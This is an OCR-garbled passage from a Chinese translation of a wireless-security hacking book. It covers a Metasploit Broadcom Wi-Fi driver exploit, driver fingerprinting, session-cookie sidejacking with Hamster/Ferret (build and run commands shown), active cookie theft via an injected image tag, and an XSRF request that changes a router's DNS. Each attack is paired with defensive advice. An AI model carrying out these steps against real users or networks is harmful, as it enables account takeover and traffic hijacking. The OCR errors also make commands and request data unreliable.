任何 网 络 关 联 在 一 起 ， 甚 至 根本 就 没 使 用 无 线 网 卡 ， 攻 击 也 可 以 成 功 。 


测试 攻击 最 简单 的 方法 是 让 Windows 寻 找 一 个 网 络 ， 从 而 处 理发 送 给 它 的 假 信 标 和 探测 回复 。 要 做 到 这 一 点 ， 只 需要 在 攻 
击 正 在 进行 的 时 候 ， 在 目标 计算 机 上 上 点击 Refresh Network List (刷新 网 络 列 表 ) 按钮 。 


Finished sending frames... 


*|] Exploit completed, but no sesslilon was created. 
ploit (broadcom wifi ssid) > 
如 果 攻 击 成 功 ， 则 可 用 无 线 网 络 列表 将 是 空白 的 ， 无 线 网 卡 的 LED 也 可 能 会 死 掉 。 如 果 发 生 这 种 情况 ， 请 查看 是 否 你 在 对 话 


框 上 有 一 个 用 Metasploit 命 名 的 市 Pwned 的 新 Administrator (过 理 员 ) 。 如 果 是 这 样 的 话 ， 茶 喜 你 尔 已 经 成 功 地 攻击 了 一 
个 内 核 级 的 漏洞 。 如 果 没 有 ， 检 查 以 下 故障 排除 建议 : 


-如果 你 有 一 个 蓝屏 错误 ， 那 么 你 可 能 选择 目标 不 正确 。 要 么 试图 找到 一 个 更 好 的 目标 ， 要 么 安装 已 知 起 作用 的 驱动 程 邦 


- 如 果 什 么 都 没有 发 生 ， 那 么 你 可 能 有 一 个 补丁 驱动 程序 ， 所 指定 的 ADDR_DST 不 正确 ， 或 者 注入 数据 包 有 问题 。 捕 获 监 
控 模 式 下 的 第 二 个 无 线 网 卡 上 的 流量 并 用 Witeshatk 寻 找 注 入 的 数据 包 ， 如 果 其 他 一 切 似 乎 合格 ， 证 明 数 据 包 实 际 上 是 在 对 空 操 
作 。 此 漏洞 中 的 BSSID 很 容易 发 现 ， 因 为 它 以 90:E9 开 始 。 


. 如 果 你 手边 没有 Btoadcom 卡 ， 看 看 在 Windows/dtivefr 下 有 什么 漏洞 可 利用 。dlink_wifi_ ratesone 是 相似 的 漏洞 ， 也 很 可 靠 。 


如 果 一 切 按 计划 进行 ， 那 么 本 书 将 以 执行 任意 代码 而 结束 。 即 使 你 不 能 使 这 个 特定 的 攻击 起 作用 ， 你 也 希望 获得 一 些 见识 ， 
诸如 如 何 运行 来 目 Metasploit 内 部 的 无 线 攻 击 。 如 果 你 想 要 得 到 一 个 关于 它 和 其 他 在 Metasploit 里 的 无 线 攻 击 的 详细 摘 写 ， 请 


查看 http://www.uninformed.org/?v=6。 关 于 无 线 设 备 驱 动 程序 漏洞 的 更 多 信息 ， 查 看 Laurent Butti 2007 年 黑 幅 简报 或 相关 
文件 。 


人 @ 设备 驱动 程序 漏洞 应 对 措施 


不 六 的 是 ， 终 端 用 户 对 于 防止 这 些 类 型 的 攻击 也 做 不 了 什么 太 多 的 事 。 这 不 同 于 在 防火 墙 和 VPN 保 护 下 的 那些 易 受 攻击 的 
应 用 程序 ， 设 备 驱动 程序 完全 是 代码 ， 在 由 防火 墙 或 VPN 处 理 之 前 ， 它 只 着 眼 于 数据 包 。 说 真 的 ， 用 户 可 以 做 得 最 有 效 的 事 
情 ， 就 是 在 不 可 信和 的 设置 下 禁用 无 线 网 卡 ， 如 安全 热点 地 区 和 机 场地 区 ， 以 及 保持 他 们 的 驱动 程序 最 新 。 如 果 你 是 网 络 管理 员 ， 
担心 客户 新 无 法 保持 最 新 ， 则 可 以 查看 Aruba 网 络 提 供 的 WiFiDEnum 工 具 (https://labs.arubanetworks.com/) 。 这 里 有 已 知 
的 、 易 受 攻击 的 驱动 程序 ， 并 会 列举 你 的 网 络 ， 利 用 WM I 来 查看 是 否 正在 安装 它们 。 


由 纹 识别 设备 驱动 程序 


正如 你 刚才 看 到 的 ， 可 靠 地 攻击 设备 驱动 程序 的 最 大 困难 之 一 ， 是 了 解 用 尸 安装 了 什么 设备 驱动 程序 ， 以 及 及 用 的 是 什么 版 
本 。 不 同 版 本 的 设备 驱动 程序 可 能 会 改变 一 个 攻击 的 细 忆 ,如果 是 针对 错误 的 版 本 ， 它 通常 会 导致 菏 些 种 类 的 内 核 芍 惊 ( 蓝 色 屏 
瑚 死机 ) 。 这 几乎 是 隐形 的 。 


如 果 友 动 攻击 乙 前 你 能 远程 确定 一 个 已 安 和 的 设备 驱动 程序 的 版 本 ， 你 可 以 确保 成 功 ， 避 免 对 目标 打 草 惊 电 。 天 于 这 一 主题 
目前 有 两 项 已 出 版 的 技术 。 


一 项 技术 ， 由 Parisa Tabriz 和 其 他 几 个 研究 生 在 美国 桑 迪 亚 国家 实验 室 开 上 有 友 ， 是 通过 分 析 管 理 帧 (特别 是 探测 请 求 ) 之 间 的 
时 序 来 工作 的 。 通 过 创建 一 个 已 知行 为 的 大 型 数据 库 ， 他 们 可 以 监视 客户 端 产生 的 流量 ， 并 确定 是 什么 设备 驱动 程序 向 它 发 送 
的 。 这 项 工作 在 一 篇 文章 中 有 描述 ， 参 见 http://asirap.net/work/USENIXSEC2006-wirelessfp.pdf。 


Johnny Cache， 本 书 的 合 闭 者 ， 开 发 了 另 一 项 反 术 。 它 是 基于 802.11 帧 的 持续 时 间 字 段 的 统计 分 析 。 相 对 于 由 又 巡 亚 国家 
实验 军 进 行 的 时 序 分 析 ， 这 种 拷 术 有 两 个 好 处 。 兽 先 ， 代 码 是 公开 的 (少数 人 甚至 已 经 成 功 地 使 用 它 ) 。 二 是 ， 在 许多 情况 下 ， 
尼 可 以 得 到 设备 驱动 程序 版 本 ， 如 果 你 对 一 个 易 受 攻击 的 驱动 程序 友 起 攻击 感 兴趣 ， 那 么 这 正 是 你 想 要 的 。 


里 然 这 一 技术 为 大 家 所 知 ， 但 它 的 代码 不 方便 使 用 。 目 前 正在 努力 使 其 用 户 界 面 更 加 友好 。 作 为 Kismet 新 版 本 的 一 个 插件 
程序 ， 这 项 技术 可 能 最 终 会 实现 。 找 到 关于 这 一 主题 的 更 多 信息 ， 最 好 的 地 方 是 http://www.uninformed.org/?v=5 或 


http://802.11mercenary.net, 


5.7 ”网 络 黑 客 和 和 Wi-Fi 


尽管 本 章 前 面 的 内 容 与 获得 远程 代码 的 执行 相关， 但 有 时 这 是 多 余 的 。 随 着 Web 应 用 程序 (wepapps) 网 络 的 出 现 ， 许 多 
人 喜欢 把 生动 有 趣 的 数据 放 到 网 上 。 几 乎 所 有 的 Web 应 用 程序 都 利用 一 个 仓储 在 cookies 中 的 会 话 ID， 在 用 户 通 过 身份 验证 后 来 
确定 他 们 。 如 果 你 能 窃取 用 户 的 cookies， 你 就 可 以 成 为 该 用 户 。 


许多 Web 应 用 程序 对 通过 HTTPS 的 用 己 名 和 密码 进行 了 很 好 的 保护 ， 但 它们 会 友 送 cookies， 说 明 你 是 通过 明文 验证 身份 
的 。 对 于 目 由 传输 这 些 cookies 的 普遍 运用 ， 最 好 的 解释 似乎 是 经 济 上 的 而 不是 技术 上 的 原因 。 昌 然 任何 给 定 用 尸 的 单一 HTTPS 
会 话 的 开销 是 最 小 的 ， 但 服务 器 处 理 数 以 干 计 的 客户 ， 成 本 残 增加 了 。 


图 5-3 显 示 用 户 没有 选择 Always Use HTTPS 功 能 登录 到 Gmail。 当 用 户 点 击 sign-in (登录 ) 按钮 时 ， 通 过 HTTPS 传 输 第 一 
个 POST 数据 。 这 确保 了 用 户 名 和 密码 不 能 被 嗅 探 (至 少 在 没有 对 SSL 主 动 攻击 时 不 被 嗅 探 ) 。 一 旦 用 户 登 录 后 ， 融 传输 会 话 


ID (SID) 。 下 一 个 HTTP 请 求 导致 用 户 得 到 GX 的 cookie。GX cookie 是 谷歌 用 来 跟 蹊 经 认证 的 会 话 。 


假设 攻击 者 可 以 看 到 谷歌 和 受害 者 之 间 的 通信 ， 她 需要 做 的 是 为 Gmail 清除 自己 的 cookies， 手 动 输入 被 嗅 探 的 GX 的 cookie 
到 她 的 浏览 器 里 ， 并 把 它 指向 mail.google.com。 此 时 ， 浏 览 器 将 友 送 GX 的 cookie， 即 使 你 的 浏览 器 友和 送 的 所 有 辅助 数据 ( 比 
如 IP、User-Agent (用 户 代 理 ) 和 Referrer (推荐 人 ) ) 是 不 同 的 ， 谷 歌会 认为 你 是 合法 用 户 。 


提示 “就 在 本 书 即将 出 版 时 ， 谷 歌 改 换 所 有 的 Gmail 默认 使 用 的 SSL。 


虽然 手动 实施 这 种 攻击 并 不 难 (你 只 需要 手动 编辑 浏览 器 中 的 cookies) ， 但 手动 四 处 复制 cookies 并 管理 哪个 cookies 属 于 
谁 可 能 是 很 之 味 的 。 盏 运 的 是 ,一 个 称 为 Hamster 的 跨 平台 工具 可 以 承担 这 个 任务 。 


用 户 


iiall.goosle.com 


POST https:/wWWwWw.google.conmyaccounts/ 


1) 


ServiceLoginAuth?service=mail z 
Email=ethicalywirelesshackinel &Passwd=insecurel234 


Set-Cookie: SID=azxlkal.. 
和 


GET https://mail.soogle.com/mail/?auth 
Cookie: SID=azxlkai... 


Set-Cookle: GX=DQAA1234 


GET http://mail.google.com/mail/?shva=1 
Cookle: SID=azxlkai 
Cookie: GX=DOAA1234 


图 5-3 ”基本 的 Gmail 认证 


@ 用 Ferret/Hamster 穷 取 被 动 的 HTTP cookie 


yy 


“A 


以 这 种 方式 窃取 cookies 的 一 种 工具 称 为 Hamster， 它 易于 使 用 。Hamster 是 一 种 跨 平 台 的 HTTP 代 理 服务 器 ， 与 一 个 名 为 
Ferret 的 辅助 工具 相配 合 。Ferret 负 责 被 动 地 嗅 探 来 自 一 个 接口 /文件 的 所 有 的 HTTP cookies， 并 将 它们 发 送 到 Hamster。 要 访 
问 Hamster， 用 户 需 要 配置 浏览 器 以 利用 Hamster 提 供 的 代理 服务 器 。 


可 以 把 Hamster 和 Ferret 下 载 到 一 个 单独 的 程序 包 里 ， 见 http://hamster.erratasec.com/。 下 面 的 命令 将 下 载 并 在 一 个 暴 


型 的 Lnux 框 上 编译 Hamster 和 Ferret: 


[~]$ mkdir Ferret; cd Ferret. 
[~/Ferret]$ wget http://hamster.erratasec.com/downloads/hamster-2.0.0.tar.z 


[~/Ferret|s$ tar -zxvf ./hamster-2.0.0.tar.z 
解压 缩 tarball 后 ， 我 们 建 六 Ferret: 
[~/Ferret]$ cd ferret/build/gcc4; make 
一 旦 完成 ， 我 们 编译 Hamster: 
[~/Ferret/ferret/build/gcc4]$ cd ../../../hamster/build/gcc4/; make 
然后 ， 我 们 需要 改变 到 Hamster 的 bin 目 录 : 
~Ferret/hamster/build/gcc4]s$ cd ../../bin/ 


并 复制 ferret 二 进 制 文件 : 


[~/Ferret/hamster/bin]ls$ cp ../../ferret/bin/ferret 


此 时 ，hamster/bin 目 录 包 含 运行 


Hamster 和 Ferret 所 需要 的 所 有 的 二 进 制 文件 和 支持 文件 。 如 果 1 


尔 愿 意 ， 你 可 以 将 它 复 制 
到 其 他 地 方 ， 并 把 它 放 在 你 的 路 径 里 。 现 在 ,我 们 只 是 在 适当 的 位 置 运 行 它 。 


[:~/Ferret/hamster/bin]s$ sudo ./hamster 
-一 一 HAMPSTER 2.0 side—acking tool ——- 
beginning thread 

Set browser to use proxy http://1217.0 
DEBUG: 
DEBUG: 


set ports opticon (1234) 
ma open 1istening port (1234) 
proxy: listening on 127.0.0.1:1234 

此 时 ， 我 们 需要 配置 浏览 器 ,利用 Hamster 作 为 代理 服务 器 。 在 Firefox 上 ， 导 航 到 Edit (编辑 ) |Preference (首选 
项 ) |Advanced (高 级 ) |Network tab (网 络 选项 卡 ) |Settings (设置 ) 。 一 旦 到 达 这 里 ， 选 择 Manual Proxy 
Configuration (手动 代理 配置 ) ，127.0.0.1 端 口 1234， 如 下 图 所 示 。 


后 Gonnection Sathings 


4 
Configure Proxies to Access the Internet 
No proxy 
LJ Auto-detect proxy settings for this network 
Use system proxy settings 
® Manual proxy configuration: 


HTTP Proxy: ] 127.0.0.1 | Port: 


Lj Use this proxy server for all protocols 
ssLPoy | Pre| of 
Frmpoyr| Pore| of 

GopherProxy: | Port: 3 


1234 


We | 
| 


DSOCKS v4 SOCKS v5 
| localhost, 127.0.0.1 
Example: .mozilla.org, .net.nz, 192.168.1.0/24 
LAutomatic proxy configuration URL: 


No Proxy for: 


本 
下 人 六 


| 全 | Help | 四 cancel | 人 ok ] 


一 旦 完成 ， 浏 览 http://hamster/， 你 会 看 到 主 Hamster 配 置 员 ， 它 应 该 类 似 于 下 图 所 示 。 


= z / 
File Edit View History Bookmarks Tools Help 


咎 以 配 ~ © 外 | 苯 http:Whamstery 
天 Most Visitedv 着 Getting Started [RB|Latest Headlinesv 


HAMSTER 2.0 Side-Jacking 


-- no 


cloned 
TIPS: remember to refresh this page occasoinally to see updates, 
targ et and make sure to purge all cookies from the browser 
WHEN SWITCHING target, rember to close all windows in your 


[ adapters | help | 


-= browser and purge all cookies first 
status 

Notarget has | Proxy: No cloned target 
been selected Adapters: none 
Ts Packets: 0 

Database: 0 

Targets: 0 

Done 
提示 如果 你 打算 经 常 使 用 Hamster， 那 么 你 可 以 为 它 设立 一 个 单独 的 Firefox 配 置 文 件 ， 这 样 你 不 需要 担心 重新 配置 代理 服 


务 器 的 设置 和 删除 自己 的 cookies。 在 Linux 上 ， 你 可 以 通过 运行 Firefox 的 ProfileManaget 来 这 么 做 。 


Hamster 并 不 真正 关心 设置 适合 嗅 探 接口 的 细节 。 因 此 ， 我 们 需要 配置 一 个 来 自命 令 行 的 接口 。 在 下 面 的 例子 中 ， 我 们 有 两 
个 无 线 网 卡 ，wlan0 和 wlan1。 一 个 名 为 linksys 的 开放 的 接 入 点 在 信道 1 上 ， 我 们 对 收集 cookies 感 兴趣 ，cookies 来 自我 们 可 以 
在 其 上 的 所 有 客户 端 。 下 面 的 命令 将 设置 这 个 阶段 : 


#iwconfig wlan0 essid linksys 
#dhclient wland0 


DHCPACK of 192.168.2.102 from 192.168.2.1 
bound to 192.168.2.102 -一 renewal in 35010 seconds. 


此 时 ， 我 们 有 用 来 连接 Gmail 的 接口 。 对 于 监控 模式 接口 ， 我 们 需要 嘿 探 其 他 用 户 的 cookies: 


#airmon-—ng start wlanl 1 

Found 1 processes that could cause trouble. 

Ift airodump-ng, alireplay-ng or alirtun-—ng stops working after 
a Short period of time, you may want to kill (some of) theml! 
PID Name 


5610 dhclient 
Intertace Chipset Driver 
wland Broadcom b43 — [phyl| 
wlanl Atheros athok = [phy2]| 
(monitor mode enabled on mon0). 
我 们 现在 有 一 个 适合 在 其 上 嗅 探 的 接口 。 你 可 能 需要 进行 一 个 快速 的 明智 检查 ,该 接口 在 告诉 Hamster 使 用 它 之 前 正在 收集 
有 趣 的 数据 包 : 


#tshark -i mon0 -~c 10 
Capturing on mond 
JU.000000 Cisco—L1i 163:au03C 一 > Broadcast IEEE 802.11 Beacon frame 
SN=] 3506, FN=0, Flag3=........ CcC; BI=]00, SSID="1l]inksys" 


看 起 来 很 不 错 。 下 一 步 就 是 要 告诉 Hamster 使 用 mon0 来 捕获 。 这 是 通过 点 击 主 页 上 的 Adapters (适配器 ) 链接 来 完成 的 。 


/ Hamster = Mozilla Firefow 
File Edit View History Bookmarks Tools Help 


所 过 6 全 | ‘http://hamstery 


Most Visitedv 逢 Getting Started 园 Latest Headlinesv 


| To start monitoring, type in the adapter name and hit the 
-=- nO | [Submit] button. This adapter must support 'promiscuous' 
-| mode monitoring. You may have to first contiqgure the 


clone | adapter on the command line, especially {or wii adapters 
Largel | man | Submit Query | 


从 


一 旦 你 告诉 Hamster 你 想 要 在 mon0 上 嗅 探 ， 你 应 该 在 局 动 的 终端 上 看 到 像 下面 这 样 内 容 : 


starting adapter mond 

ferret -1 mond -—-hamster 

一 一 FERRET 1 .2.0 一 2008 (Cj Errata Security 
— Sniffing on interface IonO 
SNIFFING: monu 

LINKTYPE: J]2/ WliF]—Radliotap 

CHANGE: ijwconifig mon0 channel 6 
Traltie Seen 


这 表明 Hamster 已 经 启动 Ferret。 然 后 Ferret 冒 昧 行事 ， 设 置 适配器 的 信道 为 6。 因 为 我 们 对 信道 1 上 的 网 络 感 兴趣 ， 所 以 我 
们 需要 手动 在 一 个 终端 上 把 它 改变 回去 : 


#ijwconfig mon0 channel 1 


Hamster 和 Ferret 现 在 一 起 工作 。Firefox 会 话 应 该 显示 出 日 益 增 多 的 数据 包 总 数 ， 一 旦 用 户 浏 览 某 处 ， 你 会 得 到 一 个 目标 
列表 。 从 目标 列表 中 点 击 一 个 目标 ， 你 会 得 到 一 列 URL， 它 很 可 能 容易 受到 左边 的 会 话 劫持 的 攻击 。Ferret 的 展 好 功能 之 一 是 ， 
会 用 唯一 标识 信息 标记 目标 |P 地 址 以 帮助 你 跟 蹊 受害 者 。 下 面 的 屏幕 显示 出 ，Ferret 已 经 断定 192.168.2.10 是 MacBook， 

文本 被 打印 在 MacBook 上 ， 并 且 192.168.2.102 作 为 ethicalwirelesshacking1 已 经 登录 进入 Gmail。 


File Edit View History Bookmarks Tools Help 


< ~ 6 储 | 曾 |http://hamster/ 
六 Most Visitedv 邓 Getting Started [BlLatest Headlines™w 


IL VW Sel 


192) 108 2 102 -WHEN SWITCHING target, rember to close al 
三 和 sl 帮 。 。， 


windows in your browser and purge all cookies first 
Status 
Proxy: Cloned target: 192.168.2.102 
: CO Adapters: mon0 
。 http:/satebrowsing- Packets: 3126925392 
cache.google.com/ Database: 84020 


Targets: 4 


[cookies| 


se。 192.168.2.103 
se。 192.168.2.100 - "ohnycshs-macbook-pro-2.local" 
。 192.168.2.102 - 
"ethicalwirelesshackingl @gqgmail.com" - "EXPIRED" - 
: "ethicalwirelesshackingl@gmail." 
四 Find: | Match case 
http://mail.google.com/mail 


为 了 动 持 ethicalwirelesshacking1@gmail.com 的 会 话 ， 我 们 需要 做 的 是 点 击 他 的 目标 入 口 ， 提 醒 Hamster 我 们 想 用 他 的 
所 有 cookies。 下 一 步 ， 通 过 全 部 删除 浏览 器 的 当前 cookies， 我 们 需要 确保 我 们 不 会 友 送 任何 有 冲突 的 cookies。 在 Firefox 中 ， 
我 们 可 以 通过 点 击 Edit (编辑 ) |Preferences (首选 项 ) |Privacy (隐私 ) |Show Cookies (显示 Cookie) |Remove All 
Cookies (删除 所 有 Cookies) 来 完成 它 ， 如 下 图 所 示 。 


Search: | ] 


The following cookies are stored on your computer: 


Site Cookie Name 


bad.yieldmanager.com 
局 amazon.com 
> 训 aus2.mozilla.org 
b I bbc.co.uk 
> 讲 bpx.a9.com 
'b doubleclick.net 


Name: 
Content: 
Host: <no cookie ecteds 
Eee N 
Send For: 
Expires: 


-一 Remove Cookles | 4 Remove All Cookles | | 
| | | ee 国 8 


然后 ， 我 们 只 需 浏 览 到 Gmail， 使 用 由 Ferret 提 供 的 左边 的 链接 。 一 旦 完成 已 ,我们 将 得 到 一 个 新 的 选项 卡 ， 它 可 以 打开 用 
户 被 动 持 的 会 话 。 

提示 ”如 果 你 有 一 个 会 话 cookie， 但 它 似乎 不 工作 ， 党 试 使 用 类 似 功能 浏览 被 动 持 的 会 话 。 举 例 来 说 ， 我 遇 到 了 动 持 
amazon.com 的 麻烦 ， 但 如 果 我 浏览 到 名 册 (这 是 受害 人 寻找 的 地 方 ) ，Amazon 突 然 认 出 了 我 ， 这 可 能 是 cookie 的 “Path” 属 性 时 


致 的 结果 。 


国防 血 HTTP cookie 动 桂 


作为 用 尸 ， 最 容易 做 的 事情 是 把 会 话 设置 成 尽 是 受到 SSL 保 护 。Gmail 可 让 你 做 自己 的 优先 选择 (并且 事实 上 ， 最 近 开始 加 
认 这 么 做 ) 。 认 真 地 退出 webapps (这 将 导致 攻击 者 的 被 克隆 的 cookie 过 期 ) 也 是 一 个 不 错 的 主意 。 当 然 ， 不 使 用 不 可 信 的 无 
线 网 络 来 查看 电子 邮件 也 是 一 个 好 主意 (如 果 不 切 实际 的 话 ) 。 


webapps 的 开发 人 员 应 该 确保 使 HTTP 会 话 暂停 时 间 在 一 个 合理 的 时 间 内 。 如 果 可 能 的 话 ， 他 们 应 该 使 用 SSL。 而 像 我 们 即 
将 看 到 的 ， 如 果 他 们 依赖 SSL 来 保护 cookies， 他 们 应 该 确信 当 设 置 Cookies 局 动 时 一 定 要 使 用 安全 位 。 


@ 主动 的 HTTP (S) cookie 窃 


他 


虽然 用 Hamster 和 Ferret 收 集 cookies 肯 定 是 方便 的 ， 但 它们 是 被 动工 具 ， 只 能 收获 受害 者 实际 访问 的 网 站 的 cookies。 如 果 
攻击 者 愿意 多 一 点 参与 征求 cookies， 那 么 他 可 以 收集 更 多 。 他 甚至 可 以 窃取 Web 应 用 程序 从 来 没有 打算 以 纯 文 本 形式 发 送 的 


COOKkies。 


考虑 以 下 场景 。 比 方 说 ， 你 正在 为 一 家 银行 建立 一 个 Web 应 用 程序 。 由 于 内 容 的 极端 敏感 性 ,设置 服务 器 使 你 的 整个 应 用 
程序 是 通过 HTTPS 托 管 的 。 从 本 质 上 讲 ， 你 编写 应 用 程序 ,一旦 一 个 客户 端 登 录 时 ， 她 的 浏览 器 将 只 获得 与 其 他 受 SSL 保 护 的 资 
源 的 链接 。 这 样 的 话 ， 永 远 不 会 给 客 尸 端 友 送 未 加 密 的 内 容 ， 并 且 永 远 不 会 要 求 客 尸 端 友 送 纯 文本 的 cookie。 


虽然 你 自己 可 能 永远 不 会 指示 浏览 器 通过 HTTP 检 索 文件 ， 但 如 果 浏 览 器 受到 指示 检索 
http://secure.bank.comy/favicon.ico， 那 么 将 会 友 生 什么 ?由 于 链接 指定 了 HTTP (不 是 HTTPS) ， 因 此 浏览 器 将 要 发 送 纯 文 
本 形式 的 GET 请 求 。 请 求 是 要 求 浏览 器 有 一 个 cookie 域 ， 因 此 它 会 尽职 尽责 地 友 送 。 此 时 ， 客 户 端 已 经 友 送 了 纯 文本 cookie， 
任何 观察 到 的 人 可 以 登录 到 目前 的 银行 会 话 并 能 转移 资金 。 


当然 ， 人 们 已 经 想到 了 这 种 攻击 。 在 这 个 时 代 ，cookies 可 以 用 一 个 Secure (安全 的 ) 或 SSL Only (SSL 唯 一 ) 标记 来 设 
置 。 当 服务 器 向 客户 问 发 送 cookie 时 ， 服 务 器 明确 禁止 客户 问 传 输 纯 文本 的 cookie。 这 就 是 secure.bank.com 需 要 做 的 事情 ， 
以 防止 浏览 器 以 纯 文本 形式 发 送 cookie。 如 果 cookie 有 安全 位 设置 ， 那 么 浏览 器 仍然 会 要 求 图 像 不 加 密 ， 但 它 不 会 传输 敏感 的 


cookie, 


虽然 这 可 能 看 起 来 像 一 件 非 常 容易 确定 的 事情 (只 在 cookie 上 设置 安全 位 ) ， 但 许多 服务 器 配置 不 当 。 例 如 ， 检 查 合 著者 
的 一 个 银行 友 送 的 cookie 属 性 。 


@ AnEC Cookie Editor vO.2.,1.3 a FE EE 


citizensbankonline,com | Filtery Refresh 


| Site Cookie Name 
touchclarity,citizensbankonline,com NSsC_Djujafot 
touchclarity,citizensbankonline,com TCID 
wwcitizensbankonlinecom ASPSESIONIDACDRSBCS 


和 : JsESSIONID 


Note! The list above is not updated autormaticallhy when the Cookle Manager Is open., 
Information about the selected Cookle 

Narme: ASPSESSIONIDACDRSBCS 

Content: EFCIKDJCLAAHDPJOFFICGCG) 

Host; wea, citizensbankonline,com 
path / I 
CC Send For: Any type of connection> 
Expires at end of session 


Selectionm: Cookie' 
Al tit [di Delete a 
Imwe 比 


FEISETEEEEHSE 


这 个 cookie 穷 取 技 术 的 一 般 方 法 如 图 5-4 中 所 示 。 它 的 工作 原理 是 监视 HTTP/HTTPS 流 量 ， 并 向 托管 在 易 受 攻击 域 的 图 像 注 
入 链接 。 除 非 cookie 是 用 HTTPS-only (HTTPS 唯 一 ) 标记 来 设置 的 ， 否 则 浏 氏 器 应 该 友 送 cookie。 


在 图 5-4 中 所 示 的 例子 中 ， 用 户 浏览 到 secure.bank.com 并 通过 HTTPS 与 服务 器 进行 交互 。 同 时 ， 在 另 一 个 选项 卡 中 ， 用 户 
检查 cnn.com。 此 时 ， 攻 击 者 将 注入 一 个 在 某 种 意义 上 类 似 于 AirPWN 的 响应 。 这 个 响应 将 包含 一 个 链接 ， 链 接 到 
secure.bank.com 上 托管 的 一 个 文件 。 现 在 ， 用 户 的 浏览 器 将 为 secure.bank.com 发 送 cookies， 这 些 cookies 没 有 SSL 位 设置 。 
如 果 此 服务 器 设置 了 不 带 SSL 位 设置 的 会 话 ID， 那 么 攻击 者 将 能 够 监视 市 图 像 要 求 的 cookie 发 送 。 


执行 一 个 主动 的 HTTPS cookie 窍 取 攻 击 
不 至 的 是 ， 这 种 攻击 目前 缺乏 一 个 公开 有 效 的 实施 。 以 自动 化 的 方式 实施 它 的 第 一 个 广泛 使 用 的 工具 称 为 Cookie 
Monster， 由 Mike Perry 在 DefCon 17 里 提出 。 然 而 ， 由 于 Linux 的 API 的 令 人 难以 置信 的 动态 本 性 ，Cookie Monster 的 最 新 版 


本 现 如 今 还 不 能 用 于 实际 工作 。 


除非 对 Cookie Monster 源 树 做 一 些 维护 ， 否 则 攻击 者 只 能 手动 实施 这 种 攻击 。 这 基本 上 归结 为 编写 一 个 AirPWN 规 则 ， 规 
定 将 手动 注入 一 个 易 受 攻击 的 域 的 链接 。 


和 secure bank com 之 
间 任 章 数 量 的 HITPS 


如 果 设 有 对 图 像 请 求 设置 
传送 cookie， 则 说 览 器 榨 


查 SSLI 位 


国防 御 主 动 的 HTTP (S) cookie 穷 


POST https://secure.bank conylogin asp 
&login=ethicalwirelesshackine 
QPasswd=showmethemoney 


Set-Cookie: ASPSESSID=3fogqa32. 


GET http/wwwenncom 


<body 1me src=" http :i/secure.bank com fiavicon ico 


GET http:i/secure.bank.conmtavicon.ico 


Cookie ASPSESSID=3foga32.. 人 人 人 


图 5-4 ”主动 锚 取 一 个 cookie 


同样 的 防御 适用 于 HTTP3 的 cookie 窃 取 ， 吏 像 HTTP 的 一 样 。 唯 一 的 区 别 是 ， 如 果 你 是 一 个 webapp 编 码 器 ， 那 么 你 应 该 明 
确 查 看 你 需要 做 什么 ， 以 确保 敏感 的 cookies 市 有 安全 位 设置 友 送 。 


通过 XSRF 攻 击 路 由 器 破解 DNS 


虽然 以 前 的 基于 Web 的 攻击 被 用 来 攻击 客 尸 端 ， 但 该 攻击 是 指导 客户 端 来 攻击 他 们 的 路 由 器 ， 这 样 我 们 可 以 再 回去 并 攻击 
客户 端 。 这 样 做 是 为 了 迫使 受害 者 的 网 络 浏览 器 访问 一 个 URL， 该 URL 导 致 他 的 路 由 器 改变 DNS 设 置 。 当 我 们 利用 一 个 恶意 


DHCP 服 务 器 来 完成 同样 的 事情 时 ， 较 早 剖 明 过 恶意 DNS 市 来 的 危险 。 这 种 类 型 漏洞 的 最 大 优点 是 ， 


它 可 以 很 容易 地 在 因特网 上 


锐利 用 (不 需要 在 同一 子 网 上 ) 。 下 一 节 将 向 你 演示 利用 这 样 的 一 个 漏洞 的 细节 ， 然 后 向 你 呈现 一 个 目 动 攻击 的 工作 脚本 。 


会 ~xsRF 攻 击 SOHO 路 由 器 


为 了 了 解 这 种 攻击 是 如 何 工作 的 ， 当 用 户 在 他 的 路 由 器 上 配置 DNS 时 你 要 明日 究竟 友 生 了 什么 。 本 节 中 的 路 由 器 是 Linksys 
WRT160N。 下 图 显示 的 是 它 的 配置 接口 ， 图 中 的 DNS 服 务 器 已 经 被 设置 到 易于 识别 的 值 。 


DHCP Server Setting 


Time $ettines 


Time Zone 


DHCP Server: OEnatied 个 Disablel (DHCP Reservation ) 
start IP Address: 10.0.1. 100 

M aximum Number of ee 

Users.: 

IP Adiress Ratee: 10 .0 .1.100t0149 

Client Lease Time: [| tttes (0 means ome ay 
static DNS 1: [1 | 1 1.[f4 | 
static DNS 2: Is |.fe |.lr |.fe i 
static DMS 3: [0 |.io [10 1 
WINS: 0 [fo |.l0 |.fo | 

| (GMT-08:00}) Pacific Time (USA& Canadal $+$| 


WAntomatically adjust cock for daylieht sanne aees. 


ave ttlinegs Cancel Changes 


通过 点 击 Save Settings (保存 设置 ) 按钮 ， 提 交 表 单 。 我 们 建议 用 一 个 Firefox 插 件 ， 比 如 TamperData， 来 监视 通信 流 
看 看 特定 型 号 的 路 由 器 正在 做 什么 。 路 由 器 发 生 的 事物 显示 如 下 。 


加 


提示 “不同 路 由 器 处 理 配 置 也 不 同 。 如 果 你 测试 的 路 由 器 改变 了 已 提交 表单 的 格式 ， 则 非常 需要 调整 URL 编 码 。 
POST http://10.0.1.1/apply.cgi 


POSTDATA=pptp dhcp=0&submit button=l&tlan proto=dhcptdhcp start=100 
gdhcp num=20&dhcp lease=0&wan dns=4 

gwan dns0 0=l&wan dns0 l=2&wan dns0 2=3&wan dns0 3=4 

gwan dnsl 0=5>&wan dnsl l=6é&wan cnsl 2=/7&wan dnsl1 3=8 


下 下 aa 一 fy 门 -一 门 磋 下 了 一 a 二 门 TT "i i 们 T 了 gr 站 一 站 
gwWan dns2? VU=0&wan dns2 J]=0&wan dns? 2=D0&wan ns 3=U 
FT 到 1 ca TT: 1 i 门 一 门 TaT 到 : mt | 一 | TT -一 下 T,T 本 人 
EWAN Wlins=4&wan wins 0=0&wan wins l=0&wan Wins ?=0 


kwan wins 3=U&time zone=-08+1]+]& daylight time=] 


粗 体 值 显示 的 是 为 DNS 服务 器 指定 的 值 。 


虽然 客 尸 端 友 送 POST 请 求 中 的 值 ， 但 在 WRT160N 的 情况 下 ， 服 务 器 也 将 响应 GET 请 求 ， 从 而 使 目 动 攻 击 服务 器 更 方便 
了 。 通 过 在 到 脚本 的 路 径 后 (一定 要 去 掉 POSTDATA= 位 ) 粘贴 POSTDATA 到 URL， 你 可 以 测试 路 由 器 是 售 接受 了 GET 请 求 而 不 
是 POSTS。 


